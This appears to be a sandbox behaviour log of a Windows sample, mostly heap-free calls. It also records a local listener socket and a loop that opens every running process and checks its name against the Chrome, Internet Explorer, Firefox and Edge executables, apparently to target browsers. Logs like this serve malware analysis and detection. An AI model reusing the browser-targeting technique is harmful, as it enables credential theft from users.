	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119ab00 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b710 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119ac50 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfd08 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33abd0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfce0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194fc8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ae58 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ad80 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aab0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194678 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33a990 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119aa90 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1195070 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191ee8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11948a8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33adc8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11946b0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfcb8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ac60 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfc90 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194e08 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300e80 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfc18 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aca8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfbf0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfc68 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ae10 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfc40 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194e40 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191fd8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ac18 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ab40 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33ad38 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfb78 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33acf0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfb50 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1195038 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11831c8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b320 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183230 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11943d8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b2d8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b290 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185de0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194918 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b1b8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11947c8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfbc8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b3f8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfba0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185d00 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192140 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11aeef8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b3b0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11aee48 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194410 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b368 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194870 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194e78 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f38 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194288 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b440 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11943a0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194368 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b518 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194838 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194f58 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300d40 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfad8 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b0e0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfab0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfb28 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b488 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfb00 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194dd0 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300e30 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194720 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b200 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194218 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfa88 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33af30 | out: hHeap=0x260000) returned 1
	[0253.323] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfa60 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194eb0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300bb0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bf9e8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aa20 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bf9c0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfa38 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b128 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfa10 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194ee8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300c50 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11aefa8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbb40 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11aef50 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11a76b0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33aaf8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11a7688 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194cf0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11921b8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbca8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbc60 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbc18 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194640 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbbd0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbb88 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194cb8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x300e08 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbe58 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbe10 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbdc8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbd80 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbd38 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbcf0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194800 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191df8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11af058 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbee8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11af000 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11a7660 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbea0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194250 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11948e0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192000 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183848 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbf78 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11836a8 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11944f0 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11dbf30 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194598 | out: hHeap=0x260000) returned 1
	[0253.324] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194988 | out: hHeap=0x260000) returned 1
	[0253.331] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 167
	os_tid = 0x68c


Thread:
	id = 168
	os_tid = 0x7e4

	[0188.418] wsprintfA (in: param_1=0xedf844, param_2="Build date: %s %s\r\n" | out: param_1="Build date: Apr 30 2019 18:51:16\r\n") returned 34
	[0188.418] ResetEvent (hEvent=0xc) returned 1
	[0188.418] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0188.455] GetProcessHeap () returned 0x260000
	[0188.455] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c) returned 0x2863e8
	[0188.455] GetProcessHeap () returned 0x260000
	[0188.455] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2000) returned 0x2893e8
	[0188.455] htons (hostshort=0x6cae) returned 0xae6c
	[0188.455] htonl (hostlong=0x7f000001) returned 0x100007f
	[0188.455] socket (af=2, type=1, protocol=6) returned 0x194
	[0188.459] setsockopt (s=0x194, level=65535, optname=4, optval="\x01", optlen=4) returned 0
	[0188.459] bind (s=0x194, addr=0xedf828*(sa_family=2, sin_port=0x6cae, sin_addr="127.0.0.1"), namelen=16) returned 0
	[0188.460] listen (s=0x194, backlog=2147483647) returned 0
	[0188.460] accept (s=0x194, addr=0xedf818, addrlen=0xedf83c) 

Thread:
	id = 170
	os_tid = 0xa3c

	[0188.530] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x759d0000
	[0188.531] GetProcAddress (hModule=0x759d0000, lpProcName="GetModuleFileNameExA") returned 0x759d15bc
	[0188.531] GetCurrentProcess () returned 0xffffffff
	[0188.531] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x101fa58 | out: Wow64Process=0x101fa58) returned 1
	[0188.531] GetCurrentProcessId () returned 0x110
	[0188.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0188.533] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0188.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0188.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0188.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x108
	[0188.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.535] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0188.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.535] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.536] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0188.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.536] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.536] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0188.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x198
	[0188.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.537] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0188.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.537] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.537] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0188.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.538] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0188.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x19c
	[0188.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.539] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0188.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.539] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.539] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0188.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.541] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.541] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0188.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1a0
	[0188.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.542] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0188.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.543] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.543] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0188.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.543] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0188.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1a4
	[0188.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.544] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0188.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.544] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.545] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0188.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.545] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.545] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0188.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1a8
	[0188.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.546] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0188.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.546] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.547] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0188.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.547] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.547] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0188.548] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1ac
	[0188.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.548] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0188.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.548] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.549] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0188.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.549] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0188.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0188.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1b0
	[0188.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.550] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0188.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.550] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0188.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.550] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0188.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0188.550] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
